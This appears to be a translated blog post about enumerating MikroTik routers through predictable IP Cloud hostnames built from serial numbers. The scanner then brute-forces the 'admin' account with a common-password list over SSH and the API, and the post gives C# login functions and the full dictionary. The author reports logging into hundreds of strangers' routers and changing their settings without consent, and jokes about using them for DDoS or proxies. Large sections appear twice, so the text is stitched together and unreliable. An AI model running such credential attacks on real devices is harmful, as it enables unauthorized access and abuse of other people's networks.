Some pitfalls of IP Cloud technology in Mikrotik routers
There are such good Mikrotik routers. And more recently, they have the functionality of "IP-Cloud". Among other things, it will allow you to get a subdomain that will be tied to a user router that does not have a permanent IP address. Or having, for us it is not important - it is important that the resulting name is not arbitrary, but the type of the serial number + .sn.mynetname.net
Since the name is not arbitrary, but it is not so difficult to find-generate the ranges of serial numbers, you can ping them and, if the address is active, try connecting.
')
To test this idea, a program with a very simple functionality was written - it generated the name of the form SN.sn.mynetname.net and pinged it. If the result was positive, the address was remembered and the process continued.
Then the program tried to connect to the found addresses with the admin username and the following passwords: 123456, password, 12345678, qwerty, abc123, 123456789, 111111, 1234567, iloveyou, adobe123, 123123, admin, 1234567890, letmein, photoshop, 1234, monkey, shadom, sunshine , 12345, password1, princess, azerty, trusno1, 000000, mikrotik, sysadmin (the list of passwords was taken from the article habrahabr.ru/post/215457 and added a couple from myself)
Connection was tried through SSH and mikrotik API and if the connection was successful, a suitable password was added to the table.
The results of the three-day scan were as follows: two million addresses were generated and pinged. Of these, accessible by ping, with IP-Cloud enabled, there were only 6715. Of them, connecting without a password turned out to 97, with a selected password to 430 (which proves once again that it is not necessary to use dictionary and light passwords)
At all points to which you managed to connect, the settings were slightly changed - the ping was removed from the outside and the connection to the router was made only from the local network + protection against brute force. It was possible to change the password, but there are few who are involved in setting up, and the admins didn’t want to complicate the work much.
PS: Where did the serial numbers come from -
For each number, 20 thousand were taken before it and the same after.
PS2: What's so bad about it - what if it wasn't my research just for lulz? RouterOS is a fairly advanced system and it is possible to automatically configure access points on DDOS or make proxies for your dirty work :)
PS3: Yes, it was possible to test the connection immediately via SSH and API, only ping was significantly faster, and that was not the point. About paralleling is also aware, but not in a hurry :)
PS4: Several links to used items
Using the Mikrotik API in C #
IP Cloud in Mikrotik routers
Since the name is not arbitrary, but it is not so difficult to find-generate the ranges of serial numbers, you can ping them and, if the address is active, try connecting.
')
To test this idea, a program with a very simple functionality was written - it generated the name of the form SN.sn.mynetname.net and pinged it. If the result was positive, the address was remembered and the process continued.
Then the program tried to connect to the found addresses with the admin username and the following passwords: 123456, password, 12345678, qwerty, abc123, 123456789, 111111, 1234567, iloveyou, adobe123, 123123, admin, 1234567890, letmein, photoshop, 1234, monkey, shadom, sunshine , 12345, password1, princess, azerty, trusno1, 000000, mikrotik, sysadmin (the list of passwords was taken from the article habrahabr.ru/post/215457 and added a couple from myself)
Connection was tried through SSH and mikrotik API and if the connection was successful, a suitable password was added to the table.
Here you can see the functions that the program tried to connect to the routers.
private string MikrotikSSHConnect(string MikrotikIP, string MikrotikPassword) { ConnectionInfo sLogin = new PasswordConnectionInfo(MikrotikIP, 22, "admin", MikrotikPassword); SshClient sClient = new SshClient(sLogin); try { sClient.Connect(); sClient.Disconnect(); return MikrotikPassword; } catch { return ""; } } private string MikrotikAPIConnect(string MikrotikIP, string MikrotikPassword) { MK mikrotik = new MK(MikrotikIP); try { if (mikrotik.Login("admin", MikrotikPassword)) { return MikrotikPassword; } } catch {} return ""; } The results of the three-day scan were as follows: two million addresses were generated and pinged. Of these, accessible by ping, with IP-Cloud enabled, there were only 6715. Of them, connecting without a password turned out to 97, with a selected password to 430 (which proves once again that it is not necessary to use dictionary and light passwords)
At all points to which you managed to connect, the settings were slightly changed - the ping was removed from the outside and the connection to the router was made only from the local network + protection against brute force. It was possible to change the password, but there are few who are involved in setting up, and the admins didn’t want to complicate the work much.
PS: Where did the serial numbers come from -
- from their points - in the course of several years of working with microtics, a lot of installations have accumulated, with many I was able to see the serial number.
- in Google I looked at the screenshots of IP-Cloud (many did not gloss over the address) + request in Google site: sn.mynetname.net
- I found quite a few numbers through a request in google mikrotik system routerboard
- With certificates of conformity
- Most of the addresses received from one fairly large seller - who shared the list of serial numbers that he had, as a guarantee. (because of this, and do not publish the full results, because I do not want to substitute the people who provided this information)
For each number, 20 thousand were taken before it and the same after.
PS2: What's so bad about it - what if it wasn't my research just for lulz? RouterOS is a fairly advanced system and it is possible to automatically configure access points on DDOS or make proxies for your dirty work :)
PS3: Yes, it was possible to test the connection immediately via SSH and API, only ping was significantly faster, and that was not the point. About paralleling is also aware, but not in a hurry :)
PS4: Several links to used items
Using the Mikrotik API in C #
IP Cloud in Mikrotik routers
Source: https://habr.com/ru/post/253291/
All Articles